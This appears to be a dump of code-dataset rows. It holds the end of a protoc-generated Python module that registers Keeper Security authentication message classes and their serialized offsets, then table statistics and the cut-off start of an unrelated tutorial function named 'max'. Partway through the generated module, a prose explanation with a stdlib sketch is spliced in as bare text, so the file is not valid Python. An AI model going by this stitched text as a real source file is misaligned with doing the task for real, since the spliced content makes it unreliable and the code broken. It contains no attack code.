'DESCRIPTOR' : _USERDATAKEYREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKeyRequest)
})
_sym_db.RegisterMessage(UserDataKeyRequest)
EnterpriseUserIdDataKeyPair = _reflection.GeneratedProtocolMessageType('EnterpriseUserIdDataKeyPair', (_message.Message,), {
'DESCRIPTOR' : _ENTERPRISEUSERIDDATAKEYPAIR,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.EnterpriseUserIdDataKeyPair)
})
_sym_db.RegisterMessage(EnterpriseUserIdDataKeyPair)
UserDataKey = _reflection.GeneratedProtocolMessageType('UserDataKey', (_message.Message,), {
'DESCRIPTOR' : _USERDATAKEY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKey)
})
_sym_db.RegisterMessage(UserDataKey)
UserDataKeyResponse = _reflection.GeneratedProtocolMessageType('UserDataKeyResponse', (_message.Message,), {
'DESCRIPTOR' : _USERDATAKEYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.UserDataKeyResponse)
})
_sym_db.RegisterMessage(UserDataKeyResponse)
MasterPasswordRecoveryVerificationRequest = _reflection.GeneratedProtocolMessageType('MasterPasswordRecoveryVerificationRequest', (_message.Message,), {
'DESCRIPTOR' : _MASTERPASSWORDRECOVERYVERIFICATIONREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.MasterPasswordRecoveryVerificationRequest)
})
_sym_db.RegisterMessage(MasterPasswordRecoveryVerificationRequest)
GetSecurityQuestionV3Request = _reflection.GeneratedProtocolMessageType('GetSecurityQuestionV3Request', (_message.Message,), {
'DESCRIPTOR' : _GETSECURITYQUESTIONV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetSecurityQuestionV3Request)
})
_sym_db.RegisterMessage(GetSecurityQuestionV3Request)
GetSecurityQuestionV3Response = _reflection.GeneratedProtocolMessageType('GetSecurityQuestionV3Response', (_message.Message,), {
'DESCRIPTOR' : _GETSECURITYQUESTIONV3RESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetSecurityQuestionV3Response)
})
_sym_db.RegisterMessage(GetSecurityQuestionV3Response)
GetDataKeyBackupV3Request = _reflection.GeneratedProtocolMessageType('GetDataKeyBackupV3Request', (_message.Message,), {
'DESCRIPTOR' : _GETDATAKEYBACKUPV3REQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetDataKeyBackupV3Request)
})
_sym_db.RegisterMessage(GetDataKeyBackupV3Request)
PasswordRules = _reflection.GeneratedProtocolMessageType('PasswordRules', (_message.Message,), {
'DESCRIPTOR' : _PASSWORDRULES,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PasswordRules)
})
_sym_db.RegisterMessage(PasswordRules)
GetDataKeyBackupV3Response = _reflection.GeneratedProtocolMessageType('GetDataKeyBackupV3Response', (_message.Message,), {
'DESCRIPTOR' : _GETDATAKEYBACKUPV3RESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetDataKeyBackupV3Response)
})
_sym_db.RegisterMessage(GetDataKeyBackupV3Response)
GetPublicKeysRequest = _reflection.GeneratedProtocolMessageType('GetPublicKeysRequest', (_message.Message,), {
'DESCRIPTOR' : _GETPUBLICKEYSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetPublicKeysRequest)
})
_sym_db.RegisterMessage(GetPublicKeysRequest)
PublicKeyResponse = _reflection.GeneratedProtocolMessageType('PublicKeyResponse', (_message.Message,), {
'DESCRIPTOR' : _PUBLICKEYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.PublicKeyResponse)
})
_sym_db.RegisterMessage(PublicKeyResponse)
GetPublicKeysResponse = _reflection.GeneratedProtocolMessageType('GetPublicKeysResponse', (_message.Message,), {
'DESCRIPTOR' : _GETPUBLICKEYSRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetPublicKeysResponse)
})
_sym_db.RegisterMessage(GetPublicKeysResponse)
SetEccKeyPairRequest = _reflection.GeneratedProtocolMessageType('SetEccKeyPairRequest', (_message.Message,), {
'DESCRIPTOR' : _SETECCKEYPAIRREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SetEccKeyPairRequest)
})
_sym_db.RegisterMessage(SetEccKeyPairRequest)
AddAppSharesRequest = _reflection.GeneratedProtocolMessageType('AddAppSharesRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDAPPSHARESREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddAppSharesRequest)
})
_sym_db.RegisterMessage(AddAppSharesRequest)
RemoveAppSharesRequest = _reflection.GeneratedProtocolMessageType('RemoveAppSharesRequest', (_message.Message,), {
'DESCRIPTOR' : _REMOVEAPPSHARESREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RemoveAppSharesRequest)
})
_sym_db.RegisterMessage(RemoveAppSharesRequest)
AppShareAdd = _reflection.GeneratedProtocolMessageType('AppShareAdd', (_message.Message,), {
'DESCRIPTOR' : _APPSHAREADD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppShareAdd)
})
_sym_db.RegisterMessage(AppShareAdd)
AppShare = _reflection.GeneratedProtocolMessageType('AppShare', (_message.Message,), {
'DESCRIPTOR' : _APPSHARE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppShare)
})
_sym_db.RegisterMessage(AppShare)
AddAppClientRequest = _reflection.GeneratedProtocolMessageType('AddAppClientRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDAPPCLIENTREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddAppClientRequest)
})
_sym_db.RegisterMessage(AddAppClientRequest)
RemoveAppClientsRequest = _reflection.GeneratedProtocolMessageType('RemoveAppClientsRequest', (_message.Message,), {
'DESCRIPTOR' : _REMOVEAPPCLIENTSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RemoveAppClientsRequest)
})
_sym_db.RegisterMessage(RemoveAppClientsRequest)
AddExternalShareRequest = _reflection.GeneratedProtocolMessageType('AddExternalShareRequest', (_message.Message,), {
'DESCRIPTOR' : _ADDEXTERNALSHAREREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AddExternalShareRequest)
})
_sym_db.RegisterMessage(AddExternalShareRequest)
AppClient = _reflection.GeneratedProtocolMessageType('AppClient', (_message.Message,), {
'DESCRIPTOR' : _APPCLIENT,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppClient)
})
_sym_db.RegisterMessage(AppClient)
GetAppInfoRequest = _reflection.GeneratedProtocolMessageType('GetAppInfoRequest', (_message.Message,), {
'DESCRIPTOR' : _GETAPPINFOREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetAppInfoRequest)
})
_sym_db.RegisterMessage(GetAppInfoRequest)
AppInfo = _reflection.GeneratedProtocolMessageType('AppInfo', (_message.Message,), {
'DESCRIPTOR' : _APPINFO,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.AppInfo)
})
_sym_db.RegisterMessage(AppInfo)
GetAppInfoResponse = _reflection.GeneratedProtocolMessageType('GetAppInfoResponse', (_message.Message,), {
'DESCRIPTOR' : _GETAPPINFORESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetAppInfoResponse)
})
_sym_db.RegisterMessage(GetAppInfoResponse)
ApplicationSummary = _reflection.GeneratedProtocolMessageType('ApplicationSummary', (_message.Message,), {
'DESCRIPTOR' : _APPLICATIONSUMMARY,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.ApplicationSummary)
})
_sym_db.RegisterMessage(ApplicationSummary)
GetApplicationsSummaryResponse = _reflection.GeneratedProtocolMessageType('GetApplicationsSummaryResponse', (_message.Message,), {
'DESCRIPTOR' : _GETAPPLICATIONSSUMMARYRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetApplicationsSummaryResponse)
})
_sym_db.RegisterMessage(GetApplicationsSummaryResponse)
GetVerificationTokenRequest = _reflection.GeneratedProtocolMessageType('GetVerificationTokenRequest', (_message.Message,), {
'DESCRIPTOR' : _GETVERIFICATIONTOKENREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetVerificationTokenRequest)
})
_sym_db.RegisterMessage(GetVerificationTokenRequest)
GetVerificationTokenResponse = _reflection.GeneratedProtocolMessageType('GetVerificationTokenResponse', (_message.Message,), {
'DESCRIPTOR' : _GETVERIFICATIONTOKENRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.GetVerificationTokenResponse)
})
_sym_db.RegisterMessage(GetVerificationTokenResponse)
SendShareInviteRequest = _reflection.GeneratedProtocolMessageType('SendShareInviteRequest', (_message.Message,), {
'DESCRIPTOR' : _SENDSHAREINVITEREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.SendShareInviteRequest)
})
_sym_db.RegisterMessage(SendShareInviteRequest)
TimeLimitedAccessRequest = _reflection.GeneratedProtocolMessageType('TimeLimitedAccessRequest', (_message.Message,), {
'DESCRIPTOR' : _TIMELIMITEDACCESSREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TimeLimitedAccessRequest)
})
_sym_db.RegisterMessage(TimeLimitedAccessRequest)
TimeLimitedAccessResponse = _reflection.GeneratedProtocolMessageType('TimeLimitedAccessResponse', (_message.Message,), {
'DESCRIPTOR' : _TIMELIMITEDACCESSRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.TimeLimitedAccessResponse)
})
_sym_db.RegisterMessage(TimeLimitedAccessResponse)
RequestDownloadRequest = _reflection.GeneratedProtocolMessageType('RequestDownloadRequest', (_message.Message,), {
'DESCRIPTOR' : _REQUESTDOWNLOADREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RequestDownloadRequest)
})
_sym_db.RegisterMessage(RequestDownloadRequest)
RequestDownloadResponse = _reflection.GeneratedProtocolMessageType('RequestDownloadResponse', (_message.Message,), {
'DESCRIPTOR' : _REQUESTDOWNLOADRESPONSE,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.RequestDownloadResponse)
})
_sym_db.RegisterMessage(RequestDownloadResponse)
Download = _reflection.GeneratedProtocolMessageType('Download', (_message.Message,), {
'DESCRIPTOR' : _DOWNLOAD,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.Download)
})
_sym_db.RegisterMessage(Download)
DeleteUserRequest = _reflection.GeneratedProtocolMessageType('DeleteUserRequest', (_message.Message,), {
'DESCRIPTOR' : _DELETEUSERREQUEST,
'__module__' : 'APIRequest_pb2'
# @@protoc_insertion_point(class_scope:Authentication.DeleteUserRequest)
})
_sym_db.RegisterMessage(DeleteUserRequest)
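The registrations above all follow one pattern: `GeneratedProtocolMessageType` is a metaclass, so each call builds a concrete message class at runtime from a descriptor and a class dict, and `_sym_db.RegisterMessage` adds it to a lookup table. A minimal stdlib-only sketch of that pattern, using Python's three-argument `type()` in place of the protobuf metaclass (the names `FakeMessageBase`, `registry`, and the field `enterpriseUserId` are illustrative only, not part of the protobuf API or of the real `SetKeyRequest` message):

```python
class FakeMessageBase:
    """Stand-in for _message.Message; real messages validate fields via the descriptor."""
    def __init__(self, **fields):
        self.__dict__.update(fields)

registry = {}

def register_message(cls):
    # mirrors _sym_db.RegisterMessage(): keep a lookup table keyed by message name
    registry[cls.__name__] = cls
    return cls

# analogous to _reflection.GeneratedProtocolMessageType('SetKeyRequest', (_message.Message,), {...})
SetKeyRequest = type('SetKeyRequest', (FakeMessageBase,), {
    '__module__': 'APIRequest_pb2',
})
register_message(SetKeyRequest)

msg = SetKeyRequest(enterpriseUserId=42)
print(msg.enterpriseUserId)                         # 42
print(registry['SetKeyRequest'] is SetKeyRequest)   # True
```

In the generated module the class dict also carries `'DESCRIPTOR'`, which is what gives real messages their typed fields, serialization, and reflection support.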
if _descriptor._USE_C_DESCRIPTORS == False:
  DESCRIPTOR._options = None
  DESCRIPTOR._serialized_options = b'\n\030com.keepersecurity.protoB\016Authentication'
  _SUPPORTEDLANGUAGE._serialized_start=14574
  _SUPPORTEDLANGUAGE._serialized_end=14887
  _LOGINTYPE._serialized_start=14889
  _LOGINTYPE._serialized_end=14979
  _DEVICESTATUS._serialized_start=14981
  _DEVICESTATUS._serialized_end=15094
  _LICENSESTATUS._serialized_start=15096
  _LICENSESTATUS._serialized_end=15161
  _ACCOUNTTYPE._serialized_start=15163
  _ACCOUNTTYPE._serialized_end=15218
  _SESSIONTOKENTYPE._serialized_start=15221
  _SESSIONTOKENTYPE._serialized_end=15425
  _VERSION._serialized_start=15427
  _VERSION._serialized_end=15498
  _MASTERPASSWORDREENTRYACTIONTYPE._serialized_start=15500
  _MASTERPASSWORDREENTRYACTIONTYPE._serialized_end=15555
  _LOGINMETHOD._serialized_start=15557
  _LOGINMETHOD._serialized_end=15665
  _LOGINSTATE._serialized_start=15668
  _LOGINSTATE._serialized_end=16123
  _ENCRYPTEDDATAKEYTYPE._serialized_start=16125
  _ENCRYPTEDDATAKEYTYPE._serialized_end=16232
  _PASSWORDMETHOD._serialized_start=16234
  _PASSWORDMETHOD._serialized_end=16279
  _TWOFACTORPUSHTYPE._serialized_start=16282
  _TWOFACTORPUSHTYPE._serialized_end=16467
  _TWOFACTORVALUETYPE._serialized_start=16470
  _TWOFACTORVALUETYPE._serialized_end=16665
  _TWOFACTORCHANNELTYPE._serialized_start=16668
  _TWOFACTORCHANNELTYPE._serialized_end=16893
  _TWOFACTOREXPIRATION._serialized_start=16896
  _TWOFACTOREXPIRATION._serialized_end=17067
  _LICENSETYPE._serialized_start=17069
  _LICENSETYPE._serialized_end=17133
  _OBJECTTYPES._serialized_start=17135
  _OBJECTTYPES._serialized_end=17240
  _ALTERNATEAUTHENTICATIONTYPE._serialized_start=17242
  _ALTERNATEAUTHENTICATIONTYPE._serialized_end=17338
  _THROTTLETYPE._serialized_start=17341
  _THROTTLETYPE._serialized_end=17623
  _REGION._serialized_start=17625
  _REGION._serialized_end=17681
  _APPLICATIONSHARETYPE._serialized_start=17683
  _APPLICATIONSHARETYPE._serialized_end=17751
  _TIMELIMITEDACCESSTYPE._serialized_start=17754
  _TIMELIMITEDACCESSTYPE._serialized_end=17918
  _APIREQUEST._serialized_start=55
  _APIREQUEST._serialized_end=231
  _APIREQUESTPAYLOAD._serialized_start=233
  _APIREQUESTPAYLOAD._serialized_end=339
  _TRANSFORM._serialized_start=341
  _TRANSFORM._serialized_end=395
  _DEVICEREQUEST._serialized_start=397
  _DEVICEREQUEST._serialized_end=455
  _AUTHREQUEST._serialized_start=457
  _AUTHREQUEST._serialized_end=541
  _NEWUSERMINIMUMPARAMS._serialized_start=544
  _NEWUSERMINIMUMPARAMS._serialized_end=683
  _PRELOGINREQUEST._serialized_start=686
  _PRELOGINREQUEST._serialized_end=823
  _LOGINREQUEST._serialized_start=826
  _LOGINREQUEST._serialized_end=1082
  _DEVICERESPONSE._serialized_start=1084
  _DEVICERESPONSE._serialized_end=1176
  _SALT._serialized_start=1178
  _SALT._serialized_end=1264
  _TWOFACTORCHANNEL._serialized_start=1266
  _TWOFACTORCHANNEL._serialized_end=1298
  _STARTLOGINREQUEST._serialized_start=1301
  _STARTLOGINREQUEST._serialized_end=1655
  _LOGINRESPONSE._serialized_start=1658
  _LOGINRESPONSE._serialized_end=2175
  _SSOUSERINFO._serialized_start=2178
  _SSOUSERINFO._serialized_end=2318
  _PRELOGINRESPONSE._serialized_start=2321
  _PRELOGINRESPONSE._serialized_end=2535
  _LOGINASUSERREQUEST._serialized_start=2537
  _LOGINASUSERREQUEST._serialized_end=2575
  _LOGINASUSERRESPONSE._serialized_start=2577
  _LOGINASUSERRESPONSE._serialized_end=2664
  _VALIDATEAUTHHASHREQUEST._serialized_start=2667
  _VALIDATEAUTHHASHREQUEST._serialized_end=2799
  _TWOFACTORCHANNELINFO._serialized_start=2802
  _TWOFACTORCHANNELINFO._serialized_end=3066
  _TWOFACTORDUOSTATUS._serialized_start=3068
  _TWOFACTORDUOSTATUS._serialized_end=3168
  _TWOFACTORADDREQUEST._serialized_start=3171
  _TWOFACTORADDREQUEST._serialized_end=3370
  _TWOFACTORRENAMEREQUEST._serialized_start=3372
  _TWOFACTORRENAMEREQUEST._serialized_end=3438
  _TWOFACTORADDRESPONSE._serialized_start=3440
  _TWOFACTORADDRESPONSE._serialized_end=3501
  _TWOFACTORDELETEREQUEST._serialized_start=3503
  _TWOFACTORDELETEREQUEST._serialized_end=3548
  _TWOFACTORLISTRESPONSE._serialized_start=3550
  _TWOFACTORLISTRESPONSE._serialized_end=3647
  _TWOFACTORUPDATEEXPIRATIONREQUEST._serialized_start=3649
  _TWOFACTORUPDATEEXPIRATIONREQUEST._serialized_end=3738
  _TWOFACTORVALIDATEREQUEST._serialized_start=3741
  _TWOFACTORVALIDATEREQUEST._serialized_end=3942
  _TWOFACTORVALIDATERESPONSE._serialized_start=3944
  _TWOFACTORVALIDATERESPONSE._serialized_end=4000
  _TWOFACTORSENDPUSHREQUEST._serialized_start=4003
  _TWOFACTORSENDPUSHREQUEST._serialized_end=4187
  _LICENSE._serialized_start=4190
  _LICENSE._serialized_end=4321
  _OWNERLESSRECORD._serialized_start=4323
  _OWNERLESSRECORD._serialized_end=4394
  _OWNERLESSRECORDS._serialized_start=4396
  _OWNERLESSRECORDS._serialized_end=4472
  _USERAUTHREQUEST._serialized_start=4475
  _USERAUTHREQUEST._serialized_end=4690
  _UIDREQUEST._serialized_start=4692
  _UIDREQUEST._serialized_end=4717
  _DEVICEUPDATEREQUEST._serialized_start=4720
  _DEVICEUPDATEREQUEST._serialized_end=4891
  _REGISTERDEVICEINREGIONREQUEST._serialized_start=4894
  _REGISTERDEVICEINREGIONREQUEST._serialized_end=5023
  _REGISTRATIONREQUEST._serialized_start=5026
  _REGISTRATIONREQUEST._serialized_end=5402
  _CONVERTUSERTOV3REQUEST._serialized_start=5405
  _CONVERTUSERTOV3REQUEST._serialized_end=5613
  _REVISIONRESPONSE._serialized_start=5615
  _REVISIONRESPONSE._serialized_end=5651
  _CHANGEEMAILREQUEST._serialized_start=5653
  _CHANGEEMAILREQUEST._serialized_end=5691
  _CHANGEEMAILRESPONSE._serialized_start=5693
  _CHANGEEMAILRESPONSE._serialized_end=5749
  _EMAILVERIFICATIONLINKRESPONSE._serialized_start=5751
  _EMAILVERIFICATIONLINKRESPONSE._serialized_end=5805
  _SECURITYDATA._serialized_start=5807
  _SECURITYDATA._serialized_end=5848
  _SECURITYDATAREQUEST._serialized_start=5851
  _SECURITYDATAREQUEST._serialized_end=5996
  _SECURITYREPORTINCREMENTALDATA._serialized_start=5999
  _SECURITYREPORTINCREMENTALDATA._serialized_end=6180
  _SECURITYREPORT._serialized_start=6183
  _SECURITYREPORT._serialized_end=6428
  _SECURITYREPORTSAVEREQUEST._serialized_start=6430
  _SECURITYREPORTSAVEREQUEST._serialized_end=6513
  _SECURITYREPORTREQUEST._serialized_start=6515
  _SECURITYREPORTREQUEST._serialized_end=6556
  _SECURITYREPORTRESPONSE._serialized_start=6559
  _SECURITYREPORTRESPONSE._serialized_end=6743
  _REUSEDPASSWORDSREQUEST._serialized_start=6745
  _REUSEDPASSWORDSREQUEST._serialized_end=6784
  _SUMMARYCONSOLEREPORT._serialized_start=6786
  _SUMMARYCONSOLEREPORT._serialized_end=6848
  _CHANGETOKEYTYPEONE._serialized_start=6850
  _CHANGETOKEYTYPEONE._serialized_end=6974
  _CHANGETOKEYTYPEONEREQUEST._serialized_start=6976
  _CHANGETOKEYTYPEONEREQUEST._serialized_end=7067
  _CHANGETOKEYTYPEONESTATUS._serialized_start=7069
  _CHANGETOKEYTYPEONESTATUS._serialized_end=7154
  _CHANGETOKEYTYPEONERESPONSE._serialized_start=7156
  _CHANGETOKEYTYPEONERESPONSE._serialized_end=7260
  _SETKEY._serialized_start=7262
  _SETKEY._serialized_end=7295
  _SETKEYREQUEST._serialized_start=7297
  _SETKEYREQUEST._serialized_end=7350
  _CREATEUSERREQUEST._serialized_start=7353
  _CREATEUSERREQUEST._serialized_end=7979
  _NODEENFORCEMENTADDORUPDATEREQUEST._serialized_start=7981
  _NODEENFORCEMENTADDORUPDATEREQUEST._serialized_end=8068
  _NODEENFORCEMENTREMOVEREQUEST._serialized_start=8070
  _NODEENFORCEMENTREMOVEREQUEST._serialized_end=8137
  _APIREQUESTBYKEY._serialized_start=8140
  _APIREQUESTBYKEY._serialized_end=8299
  _MEMCACHEREQUEST._serialized_start=8301
  _MEMCACHEREQUEST._serialized_end=8347
  _MEMCACHERESPONSE._serialized_start=8349
  _MEMCACHERESPONSE._serialized_end=8395
  _MASTERPASSWORDREENTRYREQUEST._serialized_start=8397
  _MASTERPASSWORDREENTRYREQUEST._serialized_end=8516
  _DEVICEREGISTRATIONREQUEST._serialized_start=8518
  _DEVICEREGISTRATIONREQUEST._serialized_end=8613
  _DEVICEVERIFICATIONREQUEST._serialized_start=8616
  _DEVICEVERIFICATIONREQUEST._serialized_end=8770
  _DEVICEVERIFICATIONRESPONSE._serialized_start=8773
  _DEVICEVERIFICATIONRESPONSE._serialized_end=8951
  _DEVICEAPPROVALREQUEST._serialized_start=8954
  _DEVICEAPPROVALREQUEST._serialized_end=9154
  _DEVICEAPPROVALRESPONSE._serialized_start=9156
  _DEVICEAPPROVALRESPONSE._serialized_end=9213
  _APPROVEDEVICEREQUEST._serialized_start=9215
  _APPROVEDEVICEREQUEST._serialized_end=9341
  _ENTERPRISEUSERALIASREQUEST._serialized_start=9343
  _ENTERPRISEUSERALIASREQUEST._serialized_end=9412
  _ENTERPRISEUSERADDALIASREQUEST._serialized_start=9414
  _ENTERPRISEUSERADDALIASREQUEST._serialized_end=9503
  _DEVICE._serialized_start=9505
  _DEVICE._serialized_end=9543
  _REGISTERDEVICEDATAKEYREQUEST._serialized_start=9545
  _REGISTERDEVICEDATAKEYREQUEST._serialized_end=9637
  _VALIDATECREATEUSERVERIFICATIONCODEREQUEST._serialized_start=9639
  _VALIDATECREATEUSERVERIFICATIONCODEREQUEST._serialized_end=9749
  _VALIDATEDEVICEVERIFICATIONCODEREQUEST._serialized_start=9752
  _VALIDATEDEVICEVERIFICATIONCODEREQUEST._serialized_end=9915
  _SENDSESSIONMESSAGEREQUEST._serialized_start=9917
  _SENDSESSIONMESSAGEREQUEST._serialized_end=10006
  _GLOBALUSERACCOUNT._serialized_start=10008
  _GLOBALUSERACCOUNT._serialized_end=10085
  _ACCOUNTUSERNAME._serialized_start=10087
  _ACCOUNTUSERNAME._serialized_end=10142
  _SSOSERVICEPROVIDERREQUEST._serialized_start=10144
  _SSOSERVICEPROVIDERREQUEST._serialized_end=10224
  _SSOSERVICEPROVIDERRESPONSE._serialized_start=10226
  _SSOSERVICEPROVIDERRESPONSE._serialized_end=10323
  _USERSETTINGREQUEST._serialized_start=10325
  _USERSETTINGREQUEST._serialized_end=10377
  _THROTTLESTATE._serialized_start=10379
  _THROTTLESTATE._serialized_end=10481
  _THROTTLESTATE2._serialized_start=10484
  _THROTTLESTATE2._serialized_end=10665
  _DEVICEINFORMATION._serialized_start=10668
  _DEVICEINFORMATION._serialized_end=10819
  _USERSETTING._serialized_start=10821
  _USERSETTING._serialized_end=10863
  _USERDATAKEYREQUEST._serialized_start=10865
  _USERDATAKEYREQUEST._serialized_end=10911
  _ENTERPRISEUSERIDDATAKEYPAIR._serialized_start=10913
  _ENTERPRISEUSERIDDATAKEYPAIR._serialized_end=10994
  _USERDATAKEY._serialized_start=10997
  _USERDATAKEY._serialized_end=11146
  _USERDATAKEYRESPONSE._serialized_start=11148
  _USERDATAKEYRESPONSE._serialized_end=11270
  _MASTERPASSWORDRECOVERYVERIFICATIONREQUEST._serialized_start=11272
  _MASTERPASSWORDRECOVERYVERIFICATIONREQUEST._serialized_end=11344
  _GETSECURITYQUESTIONV3REQUEST._serialized_start=11346
  _GETSECURITYQUESTIONV3REQUEST._serialized_end=11431
  _GETSECURITYQUESTIONV3RESPONSE._serialized_start=11433
  _GETSECURITYQUESTIONV3RESPONSE._serialized_end=11547
  _GETDATAKEYBACKUPV3REQUEST._serialized_start=11549
  _GETDATAKEYBACKUPV3REQUEST._serialized_end=11659
  _PASSWORDRULES._serialized_start=11661
  _PASSWORDRULES._serialized_end=11779
  _GETDATAKEYBACKUPV3RESPONSE._serialized_start=11782
  _GETDATAKEYBACKUPV3RESPONSE._serialized_end=12073
  _GETPUBLICKEYSREQUEST._serialized_start=12075
  _GETPUBLICKEYSREQUEST._serialized_end=12116
  _PUBLICKEYRESPONSE._serialized_start=12118
  _PUBLICKEYRESPONSE._serialized_end=12232
  _GETPUBLICKEYSRESPONSE._serialized_start=12234
  _GETPUBLICKEYSRESPONSE._serialized_end=12314
  _SETECCKEYPAIRREQUEST._serialized_start=12316
  _SETECCKEYPAIRREQUEST._serialized_end=12386
  _ADDAPPSHARESREQUEST._serialized_start=12388
  _ADDAPPSHARESREQUEST._serialized_end=12476
  _REMOVEAPPSHARESREQUEST._serialized_start=12478
  _REMOVEAPPSHARESREQUEST._serialized_end=12540
  _APPSHAREADD._serialized_start=12543
  _APPSHAREADD._serialized_end=12678
  _APPSHARE._serialized_start=12680
  _APPSHARE._serialized_end=12803
  _ADDAPPCLIENTREQUEST._serialized_start=12806
  _ADDAPPCLIENTREQUEST._serialized_end=12973
  _REMOVEAPPCLIENTSREQUEST._serialized_start=12975
  _REMOVEAPPCLIENTSREQUEST._serialized_end=13039
  _ADDEXTERNALSHAREREQUEST._serialized_start=13041
  _ADDEXTERNALSHAREREQUEST._serialized_end=13167
  _APPCLIENT._serialized_start=13170
  _APPCLIENT._serialized_end=13378
  _GETAPPINFOREQUEST._serialized_start=13380
  _GETAPPINFOREQUEST._serialized_end=13421
  _APPINFO._serialized_start=13424
  _APPINFO._serialized_end=13566
  _GETAPPINFORESPONSE._serialized_start=13568
  _GETAPPINFORESPONSE._serialized_end=13630
  _APPLICATIONSUMMARY._serialized_start=13633
  _APPLICATIONSUMMARY._serialized_end=13811
  _GETAPPLICATIONSSUMMARYRESPONSE._serialized_start=13813
  _GETAPPLICATIONSSUMMARYRESPONSE._serialized_end=13909
  _GETVERIFICATIONTOKENREQUEST._serialized_start=13911
  _GETVERIFICATIONTOKENREQUEST._serialized_end=13958
  _GETVERIFICATIONTOKENRESPONSE._serialized_start=13960
  _GETVERIFICATIONTOKENRESPONSE._serialized_end=14026
  _SENDSHAREINVITEREQUEST._serialized_start=14028
  _SENDSHAREINVITEREQUEST._serialized_end=14067
  _TIMELIMITEDACCESSREQUEST._serialized_start=14070
  _TIMELIMITEDACCESSREQUEST._serialized_end=14267
  _TIMELIMITEDACCESSRESPONSE._serialized_start=14269
  _TIMELIMITEDACCESSRESPONSE._serialized_end=14314
  _REQUESTDOWNLOADREQUEST._serialized_start=14316
  _REQUESTDOWNLOADREQUEST._serialized_end=14359
  _REQUESTDOWNLOADRESPONSE._serialized_start=14361
  _REQUESTDOWNLOADRESPONSE._serialized_end=14464
  _DOWNLOAD._serialized_start=14466
  _DOWNLOAD._serialized_end=14534
  _DELETEUSERREQUEST._serialized_start=14536
  _DELETEUSERREQUEST._serialized_end=14571
# @@protoc_insertion_point(module_scope)
| 67.03569 | 31,474 | 0.827611 | 11,190 | 99,548 | 7.042002 | 0.110903 | 0.012881 | 0.020241 | 0.037157 | 0.319099 | 0.223338 | 0.195495 | 0.174505 | 0.162855 | 0.054467 | 0 | 0.097644 | 0.05301 | 99,548 | 1,484 | 31,475 | 67.080863 | 0.738244 | 0.092478 | 0 | 0.199184 | 1 | 0.03102 | 0.351114 | 0.271023 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.03102 | 0.005714 | 0 | 0.005714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a103c3ae6b71b6f0c6563f7413a2d17a9d5b35b | 142 | py | Python | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | CZ1003/tutorial/cz1003_tut4-2.py | khamiruf/NTU_CompSci | 6c013c8653cdca275d1a0a70f8e0896815bedef3 | [
"CNRI-Python"
] | null | null | null | def max(a, b):
    # Note: this shadows the built-in max() and, unlike it, returns the
